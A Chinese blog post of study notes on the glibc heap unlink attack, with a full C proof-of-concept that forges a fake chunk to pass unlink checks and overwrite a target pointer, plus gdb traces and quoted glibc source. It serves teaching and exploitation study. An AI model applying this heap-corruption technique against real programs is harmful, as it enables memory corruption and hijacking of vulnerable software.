关于如何理解Glibc堆管理器(Ⅳ——从Unlink攻击理解指针与chunk寻址方式)

最新推荐文章于 2023-04-24 19:48:03 发布
最新推荐文章于 2023-04-24 19:48:03 发布
阅读量467 收藏 5
点赞数 2
分类专栏: 关于如何理解Glibc堆管理器 文章标签: glibc 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tokameine/article/details/119299319
版权

本篇实为个人笔记,可能存在些许错误;若各位师傅发现哪里存在错误,还望指正。感激不尽。

若有图片及文稿引用,将在本篇结尾处著名来源。

目录

参考文章:

环境与工具:

源代码:

代码调试:

什么是Unlink:

调试继续:

Unlink安全性检查:

调试继续:

Free与触发Unlink:

关于寻址:

参考文章:

        在此先给出几篇可供参考的文章。笔者认为几位师傅所写的都比笔者所写要来得更加精炼。倘若您通过如下几篇文章已经能够完全理解Unlink为何,那么大可以不再阅读这篇冗长的文章。

        安全客:https://www.anquanke.com/post/id/197481

        看雪:https://bbs.pediy.com/thread-224836.htm

        CTF-WIKI:https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/unlink/

环境与工具:

        环境:Ubuntu16.4 / gcc / (gdb)pwn-dbg

        范例:Heap Exploitation系列unlink部分(源代码将直接在下面贴出)

源代码:

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
 
struct chunk_structure {
  size_t prev_size;
  size_t size;
  struct chunk_structure *fd;
  struct chunk_structure *bk;
  char buf[10];               // padding
};
 
int main() {
  unsigned long long *chunk1, *chunk2;
  struct chunk_structure *fake_chunk, *chunk2_hdr;
  char data[20];
 
  // First grab two chunks (non fast)
  chunk1 = malloc(0x80);
  chunk2 = malloc(0x80);
  printf("%p\n", &chunk1);
  printf("%p\n", chunk1);
  printf("%p\n", chunk2);
 
  // Assuming attacker has control over chunk1's contents
  // Overflow the heap, override chunk2's header
 
  // First forge a fake chunk starting at chunk1
  // Need to setup fd and bk pointers to pass the unlink security check
  fake_chunk = (struct chunk_structure *)chunk1;
  fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
  fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P
 
  // Next modify the header of chunk2 to pass all security checks
  chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
  chunk2_hdr->prev_size = 0x80;  // chunk1's data region size
  chunk2_hdr->size &= ~1;        // Unsetting prev_in_use bit
 
  // Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
  // This results in chunk1 pointer pointing to chunk1 - 3
  // i.e. chunk1[3] now contains chunk1 itself.
  // We then make chunk1 point to some victim's data
  free(chunk2);
  printf("%p\n", chunk1);
  printf("%p\n", chunk1[3]);
 
  chunk1[3] = (unsigned long long)data;
 
  strcpy(data, "Victim's data");
 
  // Overwrite victim's data using chunk1
  chunk1[0] = 0x002164656b636168LL;
 
  printf("%s\n", data);
 
  return 0;
}

代码调试:

        读者可以试着先行阅读一下代码,看看是否能够理解其逻辑。笔者在调试时由于对指针和寻址等相关知识的不熟练而倍感困惑,倘若读者在阅读代码过程中通畅无阻,那么这个案例便不是那么困难了。

gdb-peda$ b 20
Breakpoint 1 at 0x40067d: file test.c, line 20.
gdb-peda$ b 31
Breakpoint 2 at 0x4006db: file test.c, line 31.
gdb-peda$ b 36
Breakpoint 3 at 0x400703: file test.c, line 36.
gdb-peda$ b 44
Breakpoint 4 at 0x400731: file test.c, line 44.
gdb-peda$ run

        首先开辟三个chunk,这此我们有必要记录一下打印得到的结果:

gdb-peda$ continue
Continuing.
0x7fffffffde00    //chunk1指针地址
0x602010    //chunk1堆地址——user data
0x6020a0    //chunk2堆地址——user data

        继续continue直到第36行,查看此时的heap

0x602000 PREV_INUSE {
  prev_size = 0x0, 
  size = 0x91, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x7fffffffdde8, 
  bk_nextsize = 0x7fffffffddf0
}
0x602090 PREV_INUSE {
  prev_size = 0x0, 
  size = 0x91, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x602120 PREV_INUSE {
  prev_size = 0x0, 
  size = 0x411, 
  fd = 0x3061303230367830, 
  bk = 0xa30306564660a, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x602530 PREV_INUSE {
  prev_size = 0x0, 
  size = 0x20ad1, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

        我们发现,chunk 1的 fd 和 bk 指针已经被指向了栈的地方。 

        先抛开这究竟是如何实现的,我们需要先了解一下

什么是Unlink:

1459 /* Take a chunk off a bin list.  */
1460 static void
1461 unlink_chunk (mstate av, mchunkptr p)
1462 {
1463   if (chunksize (p) != prev_size (next_chunk (p)))
1464     malloc_printerr ("corrupted size vs. prev_size");
1465 
1466   mchunkptr fd = p->fd;
1467   mchunkptr bk = p->bk;
1468 
1469   if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
1470     malloc_printerr ("corrupted double-linked list");
1471 
1472   fd->bk = bk;
1473   bk->fd = fd;
1474   if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
1475     {
1476       if (p->fd_nextsize->bk_nextsize != p
1477           || p->bk_nextsize->fd_nextsize != p)
1478         malloc_printerr ("corrupted double-linked list (not small)");
1479 
1480       if (fd->fd_nextsize == NULL)
1481         {
1482           if (p->fd_nextsize == p)
1483             fd->fd_nextsize = fd->bk_nextsize = fd;
1484           else
1485             {
1486               fd->fd_nextsize = p->fd_nextsize;
1487               fd->bk_nextsize = p->bk_nextsize;
1488               p->fd_nextsize->bk_nextsize = fd;
1489               p->bk_nextsize->fd_nextsize = fd;
1490             }
1491         }
1492       else
1493         {
1494           p->fd_nextsize->bk_nextsize = p->bk_nextsize;
1495           p->bk_nextsize->fd_nextsize = p->fd_nextsize;
1496         }
1497     }
1498 }

        Unlink实则为一个函数,在特定情况下被调用。函数功能为:将一个chunk从链表中摘下

        这里所说的链表,其实就是Bins结构。

        这里引用一下知世师傅的总结:

使用unlink的时机

  • malloc
    1. 在恰好大小的large chunk处取chunk时
    2. 在比请求大小大的bin中取chunk时
  • Free
    1. 后向合并,合并物理相邻低物理地址空闲chunk时
    2. 前向合并,合并物理相邻高物理地址空闲chunk时(top chunk除外)
  • malloc_consolidate
    1. 后向合并,合并物理相邻低地址空闲chunk时。
    2. 前向合并,合并物理相邻高地址空闲 chunk时(top chunk除外)

  • realloc

    前向扩展,合并物理相邻高地址空闲 chunk(除了top chunk)

        其具体的执行效果一言蔽之就是:(P为链表中需要被摘下的节点)

P->fd->bk = P->bk.
P->bk->fd = P->fd.

        本章我们将以Free时候发生Unlink来示范,看看堆管理器究竟在做些什么。

调试继续:

        我们查看一下两个指针的地址,并在图中标出:(不要过于纠结fake_chunk名字的意义)

gdb-peda$ p fake_chunk 
$1 = (struct chunk_structure *) 0x602010
gdb-peda$ p &fake_chunk 
$2 = (struct chunk_structure **) 0x7fffffffde10
gdb-peda$ p &chunk1 
$3 = (unsigned long long **) 0x7fffffffde00
gdb-peda$ p &data
$4 = (char (*)[20]) 0x7fffffffde20

         第32,33行的两行代码,我将其地址标注在上图中了。值得注意的是,这两个指针均为“指向chunk”的指针,即——将 &chunk1-3 &chunk1-2 视为了两个不同的chunk

Unlink安全性检查:

// fd bk
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                      \
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \

        由于这个检查,因此才有上面的伪造。

        现在,不妨跟随一下这个检查,其要求为:(P为链表中需要被摘下的节点,此处是chunk1)

P->fd->bk == P
P->bk->fd == P

         chunk1->fd=&chunk1-3,根据上面的栈表,我们可以轻松的发现:chunk1->fd->bk=602010

        对于另外一个判断也是如此。我们成功的将 栈 伪造成了两个chunk(fd和bk)来骗过了管理器。

调试继续:

         因为

  fake_chunk = (struct chunk_structure *)chunk1;

         因此,我们操作fake_chunk的fd/bk指针就是操作chunk1的对应指针,于是才有了前面给出的堆的状态。

        继续调试,从第36行到44行。

        chunk2_hdr是指向chunk2真正的开头的指针。在第二章中曾提到过,malloc返回的内容并不是真正指向chunk的开头,而是往下增加了16字节。

        第37和38行则是在伪造chunk1的状态:

        prev_size表示上一个相邻空闲块的大小(若该相邻块是被使用的,则会被占用,用来填充用户数据),第38行则将P标记位置0,表示上一个相邻块已被释放。

        至此,我们已经伪造好了chunk1的状态。当使用free(chunk2)的时候,管理器会发现chunk1是处于被释放状态的,于是将chunk2和chunk1进行合并。

Free与触发Unlink:

        当我们执行

free(chunk2);

        时候将触发Unlink,对chunk1做如下行为:

P->fd->bk = P->bk.
P->bk->fd = P->fd.

        结果是令人疑惑的,但如果按照笔者上述的逻辑,大致还是能够理顺的:(P为chunk1)

&(P->fd->bk)=0x7fffffffde10
该地址处的内容被替换为(&chunk1-2)=0x7fffffffddf0
&(P->bk->fd)=0x7fffffffde10
该地址处的内容被替换为(&chunk1-3)=0x7fffffffdde8

         现在我们再看chunk1与chunk[3],将得到相同的结果:

gdb-peda$ p chunk1
$16 = (unsigned long long *) 0x7fffffffdde8
gdb-peda$ p &chunk1[3]
$17 = (unsigned long long *) 0x7fffffffde00
gdb-peda$ p chunk1[3]
$18 = 0x7fffffffdde8

         "chunk1的内容和chunk1[3]相同,chunk1[3]的地址和chunk1的地址相同",乍一看相当反直觉的表述,但根据栈图还是能够理解的,继续往下:

  chunk1[3] = (unsigned long long)data;

        此时,该操作就会将chunk1的值替换为Data的指针。因此,只要我们能够操作chunk1的值,就变相的能够读写Data中的数据了

  chunk1[0] = 0x002164656b636168LL;
  printf("%s\n", data);//hacked!

关于寻址:

         说了这么多,最后是关于寻址的问题。

        上文案例中,chunk1并不在Bins中,那这个Unlink的执行会否显得有些突兀?

        从寻址的角度来说,管理器并不关心chunk1是否处于Bins中。它通过Size和Prev_Size来找到chunk1,并且由于chunk1的fd和bk指针都存在,管理器就误认为chunk1是被挂在Bins中的一个节点。也就是说,堆管理器并没有检查Bins中是否真的存在这个节点

        实际上,即使chunk1真的是Bins中的一个节点,这种寻址方式也不会有任何问题,它会顺利的摘下chunk1;只是在本例中,管理器以为自己从Bins中摘除了chunk1罢了

        

Tokameine
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
glibc堆内存管理
qq_35018427的博客
08-02 1682
glibc堆内存管理
glibc堆内存管理流程图梳理
10-26
glibc堆内存管理流程图梳理
GLIBC内存管理源码分析
Amazing
05-12 1569
1. glibc公共接口 #define SIZE_SZ sizeof(size_t) //32位机下位4个字节,64位机下位8个字节 #define MALLOC_ALIGNMENT 16 //不管是32位还是64位,均为16 #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) #define MIN_CHUNK_SIZE (offsetof...
glibc 内存管理简记
紫无之紫的博客
01-10 1490
glibc 内存管理 最近在项目中遇到了一个内存涨的问题,每次连接数据库操作查询后内存都会涨,经分析发现是因为:程序中有段代码执行后,进行上百万次malloc,然后再依次free,但进程内存没有下降。 在查找了glibc的相关资料后发现,glibc 的free 的释放内存并不是把内存还给操作系统而是放入bin(free list),同时每个线程都会维护自己的堆与free list(在核心数足够的情...
glibc下malloc与free的实现原理(一):用到的数据结构
weixin_44215692的博客
03-30 4027
本系列讲解glibc下malloc和free的实现原理,参考资料是CTF-wiki。本节仅讲解了一些用到的数据结构
glibc源码分析-malloc-free
kidsama123的博客
04-19 645
简要分析malloc和free源码
glibc内存管理ptmalloc源代码分析-高清PDF-pdf版
04-16
glibc内存管理ptmalloc源代码分析》是一份深入探讨Linux系统中glibc库内存管理机制的专业资料。glibc,全称GNU C Library,是Linux操作系统下广泛使用的C语言标准库,其中ptmalloc是glibc中负责动态内存分配的核心...
glibc动态内存管理
01-07
malloc函数有两种不同的内存分配方法,这取决于开辟空间的大小或用户传入的具体参数,最常见的分配方法是从一大块连续的内存区域分配一部分出来,并管理这些相邻的区块以优化其使用和减少浪费不可用块。传统系统的堆...
堆漏洞之unlink1
08-04
`unlink`操作是glibc内存管理中的关键部分,它负责将chunk从内存池的bin中移除。在进行`unlink`时,会更新chunk及其相邻chunk指针,包括fd、bk,以及在largebin中的fd_nextsize和bk_nextsize。这个过程涉及到内存...
glibc堆概述(笔记)
最新发布
NANMUZN的博客
04-24 134
堆是程序虚拟内存中由低地向高地增长的线性区域。堆的位置一般在BSS段的高地处。一般堆管理机制由用户显式调用malloc()函数申请内存,调用free()函数释放内存。
unlink函数_堆利用之 unlink
weixin_39736047的博客
12-11 666
1 知识补充什么是unlinkunlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来。哪里用到unlinkunlink()常用于free()中进行 chunk 的整理,可以对空闲 chunk 进行前向合并和后向合并。当被free()的 chunk 的 P 位为 0 时,说明被free()的 chunk 的前一个 chunk 为空,于是对前一个 chunk 进行 unlink...
【堆漏洞-Off_by_one】
m0_52343643的博客
04-06 1261
缓冲区溢出的一种,只能溢出一个字节普通 off_by_one ,修改堆上指针通过溢出修改堆块头,制造堆块重叠,达到泄露与改写目的-(1) 扩展被释放堆块-(2) 扩展已分配堆块-(3) 收缩被释放堆块-常见的漏洞场景1、 for循环多接收了一个字符2、 strcpy与strlen的行为不一致,strlen不计算入‘ \x00 ’,strcpy会把‘ \x00 ’一同复制3、判断字符串结束符为‘ \n ’,而不是‘ \x00 ’版本问题。
unlink
m0_64195960的博客
06-07 218
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地空闲chunk时·前向合并,合并物理相邻高地空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地空闲
关于如何理解Glibc管理(Ⅷ——从源代码理解malloc)
Tokameine的博客
08-07 1312
本篇实为个人笔记,可能存在些许错误;若各位师傅发现哪里存在错误,还望指正。感激不尽。 若有图片及文稿引用,将在本篇结尾处著名来源(也有置于篇首的情况)。 关于glibc管理Ptmalloc2的实际讨论在前几节已经大致结束了,但是笔者仍觉得对其分配机制缺少完整的认识,于是最后两节将直接通过源代码来对其分配和释放规则进行分析 尽管笔者所用的Ubuntu18.04使用glibc-2.27,但笔者在对照源代码后发现,实际的操作和官方放出的glibc2.29更加接近,因此...
dlmalloc解析连载四
lenky0401的专栏
05-24 1452
上两篇讲解的chunk块是dlmalloc内比较细粒度的管理结构,比它们更大的内存块被称之为段(segment),其结构体以及相关定义如下:struct malloc_segment {  char*        base;             /* base address */  size_t       size;             /* allocated size
堆内存(7)——内存释放入口函数_lib_free
qq_42584874的博客
03-11 541
_libc_free void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ void (*hook) (void *, const void *) = atomic_forced_read (__free_hook); if (__builtin_expect (hook != NULL, 0))
PWN之堆利用-unlink攻击
susuate的博客
07-18 1649
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
堆溢出——unlink漏洞攻击(bamboobox)
fzucaicai的博客
03-22 774
当要free掉某个堆块时,如果其低地chunk是空闲的,那么这里的P就是被释放掉的堆块的地减去自己的pre_size里的数值,这样就可以指向低地chunkchunk头了,通过堆溢出修改掉被释放的chunk的pre_size和size,就可以达到释放该chunk时,unlink调用的P是是指向假chunkchunk头。1.首先检查被合并的chunk的大小是否正确,程序会先检查被合并的chunk的size是否与其物理相连的下一个chunk的presize是否相符。
堆漏洞利用之chunk扩展和重叠1
08-04
本文将探讨堆漏洞利用中的chunk扩展和重叠技术,这是针对Linux系统中glibc库内存管理机制的一种利用方式。我们将基于CentOS 6.10(Final) 32位环境,内核版本2.6.32,gcc 4.4.7,gdb 7.2,libc 2.12和glibc 2.12进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值